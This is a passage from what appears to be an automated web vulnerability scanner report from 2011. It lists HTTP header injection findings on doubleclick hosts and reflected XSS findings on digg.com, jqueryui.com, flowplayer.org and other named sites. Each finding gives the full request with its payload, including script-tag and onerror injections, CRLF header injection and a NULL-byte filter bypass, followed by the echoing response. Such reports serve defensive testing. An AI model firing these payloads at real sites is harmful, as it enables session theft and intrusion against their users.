GET /getcamphist;src=337209;host=metrics.nutrisystem.com%2Fb%2Fss%2Fnutrisystemprod1%2F1%2FH.22.1%2Fs83592933702748%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26968B4605013993-6000010B4000F0FF%26%26ndh%3D1%26t%3D11%252F0%252F2011%252020%253A49%253A13%25202%2520360%26ns%3Dnutrisystem%26pageName%3DSalesFun%253AHome%26g%3Dhttp%253A%252F%252Fwww.nutrisystem.com%252Fjsps_hmr%252Fhome%252Findex.jsp%253F_requestid%253D566196%26cc%3DUSD%26vvp%3DDFA%2523337209%253Av3%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3DHome%253ASalesFun%26server%3Dwww.nutrisystem.com%26events%3Devent33%26c4%3DContent%26c5%3DSalesFun%26v6%3DIID_29521%2523%26c13%3D9%253A30PM%26c14%3DTuesday%26c15%3DWeekday%26v18%3DIID_29521%2523%26v19%3D9%253A30PM%26v20%3DTuesday%26v21%3DWeekday%26c26%3Dno_test%2523%26v26%3Dno_test%2523%26v27%3Dno_test%2523%26v41%3DDirect%2520Load%26v42%3DDirect%2520Load%26v43%3Dn%252Fa%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1158%26bh%3D750%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26AQE%3D1341ea%0d%0a2dff0366dc2&A2S=1;ord=798202721 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nutrisystem.com/jsps_hmr/home/index.jsp?_requestid=566196
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.0 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.nutrisystem.com/b/ss/nutrisystemprod1/1/H.22.1/s83592933702748?AQB=1&vvpr=true&&pccr=true&vidn=26968B4605013993-6000010B4000F0FF&&ndh=1&t=11%2F0%2F2011%2020%3A49%3A13%202%20360&ns=nutrisystem&pageName=SalesFun%3AHome&g=http%3A%2F%2Fwww.nutrisystem.com%2Fjsps_hmr%2Fhome%2Findex.jsp%3F_requestid%3D566196&cc=USD&vvp=DFA%23337209%3Av3%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=Home%3ASalesFun&server=www.nutrisystem.com&events=event33&c4=Content&c5=SalesFun&v6=IID_29521%23&c13=9%3A30PM&c14=Tuesday&c15=Weekday&v18=IID_29521%23&v19=9%3A30PM&v20=Tuesday&v21=Weekday&c26=no_test%23&v26=no_test%23&v27=no_test%23&v41=Direct%20Load&v42=Direct%20Load&v43=n%2Fa&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1158&bh=750&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1341ea
2dff0366dc2
&A2S=1/respcamphist;src=337209;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1294800705


1.3. http://ad.doubleclick.net/ad/N1823.microsoft.com/B5062614.67 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N1823.microsoft.com/B5062614.67

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 75ca6%0d%0a38e32021945 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /75ca6%0d%0a38e32021945/N1823.microsoft.com/B5062614.67;sz=1x1 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/75ca6
38e32021945
/N1823.microsoft.com/B5062614.67%3Bsz%3D1x1:
Date: Wed, 12 Jan 2011 02:18:25 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.53 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4492.MSN/B5014254.53

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 28953%0d%0a3abeb4d1865 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /28953%0d%0a3abeb4d1865/N4492.MSN/B5014254.53 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/28953
3abeb4d1865
/N4492.MSN/B5014254.53:
Date: Wed, 12 Jan 2011 02:17:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/adj/N5767.msn.comOX2567/B4643263.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5767.msn.comOX2567/B4643263.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69577%0d%0aee5e8a85d3e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69577%0d%0aee5e8a85d3e/N5767.msn.comOX2567/B4643263.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69577
ee5e8a85d3e
/N5767.msn.comOX2567/B4643263.3:
Date: Wed, 12 Jan 2011 02:51:51 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.6. http://m.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d4667%0d%0aaa431c8527f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifd4667%0d%0aaa431c8527f HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: m.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifd4667
aa431c8527f


<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)  previous  next
There are 95 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009ce08"><script>alert(1)</script>ff5697bd6ab was submitted in the REST URL parameter 1. This input was echoed as 9ce08"><script>alert(1)</script>ff5697bd6ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%009ce08"><script>alert(1)</script>ff5697bd6ab/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:36:21 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%009ce08"><script>alert(1)</script>ff5697bd6ab/2006/">
...[SNIP]...

2.2. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0049a7d<a>81aa360aa7b was submitted in the REST URL parameter 1. This input was echoed as 49a7d<a>81aa360aa7b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%0049a7d<a>81aa360aa7b/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:36:22 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>81aa360aa7b/">weblog%0049a7d<a>81aa360aa7b</a>
...[SNIP]...

2.3. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 693ef<a>28c96dc76a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/again693ef<a>28c96dc76a7/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:36:25 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Wed, 12 Jan 2011 03:36:26 GMT
Last-Modified: Wed, 12 Jan 2011 03:36:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/again693ef<a>28c96dc76a7/</h1>
...[SNIP]...

2.4. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa25b"><script>alert(1)</script>7021070eada was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa25b\"><script>alert(1)</script>7021070eada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?aa25b"><script>alert(1)</script>7021070eada=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:36:17 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Wed, 12 Jan 2011 03:36:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 213693

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?aa25b\"><script>alert(1)</script>7021070eada=1#preview" method="post">
...[SNIP]...

2.5. http://digg.com/search [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00820a2"><script>alert(1)</script>31bcc02b783 was submitted in the REST URL parameter 1. This input was echoed as 820a2"><script>alert(1)</script>31bcc02b783 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search%00820a2"><script>alert(1)</script>31bcc02b783 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:31:15 GMT; path=/; domain=digg.com
Set-Cookie: d=ee7aa0a7a672a28da571fc570eb525c3c3e89cc1ff2897a2f57dab35e3940a00; expires=Mon, 11-Jan-2021 13:38:55 GMT; path=/; domain=.digg.com
X-Digg-Time: D=282292 10.2.129.156
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15325

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/search%00820a2"><script>alert(1)</script>31bcc02b783.rss">
...[SNIP]...

2.6. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001d0e8"><script>alert(1)</script>d74a1e5d265 was submitted in the REST URL parameter 1. This input was echoed as 1d0e8"><script>alert(1)</script>d74a1e5d265 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%001d0e8"><script>alert(1)</script>d74a1e5d265 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1454381204777206016%3A154; expires=Thu, 13-Jan-2011 03:31:14 GMT; path=/; domain=digg.com
Set-Cookie: d=633aa567d733bcf98499bd933f31f93f38e95c97324bdaeff8515a0b768d3234; expires=Mon, 11-Jan-2021 13:38:54 GMT; path=/; domain=.digg.com
X-Digg-Time: D=236085 10.2.130.111
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15325

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%001d0e8"><script>alert(1)</script>d74a1e5d265.rss">
...[SNIP]...

2.7. http://flowplayer.org/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d634"><img%20src%3da%20onerror%3dalert(1)>6e8e8d436b9 was submitted in the REST URL parameter 1. This input was echoed as 2d634"><img src=a onerror=alert(1)>6e8e8d436b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools2d634"><img%20src%3da%20onerror%3dalert(1)>6e8e8d436b9/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 12 Jan 2011 03:34:16 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Cache-control: private
Content-Length: 5920


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="tools2d634"><img src=a onerror=alert(1)>6e8e8d436b9" class="msie tools">
...[SNIP]...

2.8. http://forum.jquery.com/topic/appendto-behaviour [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/appendto-behaviour

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dccf"><script>alert(1)</script>285b993d3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/appendto-behaviour?5dccf"><script>alert(1)</script>285b993d3ed=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=82e41c45-2936-41df-b4c9-fba6b528beb6; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=81510917411E2E0F229E0BB5DDB5DC09; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 12 Jan 2011 03:34:22 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/appendto-behaviour?5dccf"><script>alert(1)</script>285b993d3ed=1&forumGroupUrl=jquery">
...[SNIP]...

2.9. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d1f"><script>alert(1)</script>c81c7f6de24 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c91d1f"><script>alert(1)</script>c81c7f6de24&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c91d1f"><script>alert(1)</script>c81c7f6de24&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55
...[SNIP]...

2.10. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 700a3"><script>alert(1)</script>d7165f4ffa4 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ctl=themeroller&ffDefault=Arial,%20Helvetica,sans-serif&fwDefault=normal&fsDefault=11px&cornerRadius=5px&bgColorHeader=79c9ec&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=75&borderColorHeader=448dae&fcHeader=000000&iconColorHeader=d8e7f3&bgColorContent=ffffff700a3"><script>alert(1)</script>d7165f4ffa4&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=e0e8f8&fcContent=000000&iconColorContent=10469d&bgColorDefault=e8f2ff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=45&borderColorDefault=e0e8f8&fcDefault=10469d&iconColorDefault=10469d&bgColorHover=79c9ec&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=448dae&fcHover=026890&iconColorHover=056b93&bgColorActive=6eac2c&bgTextureActive=12_gloss_wave.png&bgImgOpacityActive=50&borderColorActive=6eac2c&fcActive=ffffff&iconColorActive=f5e175&bgColorHighlight=f8da4e&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcd113&fcHighlight=915608&iconColorHighlight=f7a50d&bgColorError=e14f1c&bgTextureError=12_gloss_wave.png&bgImgOpacityError=45&borderColorError=cd0a0a&fcError=ffffff&iconColorError=fcd113&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=999999&bgTextureShadow=01_flat.png&bgImgOpacityShadow=55&opacityShadow=45&thicknessShadow=0px&offsetTopShadow=5px&offsetLeftShadow=5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 12 Jan 2011 03:45:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120142

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
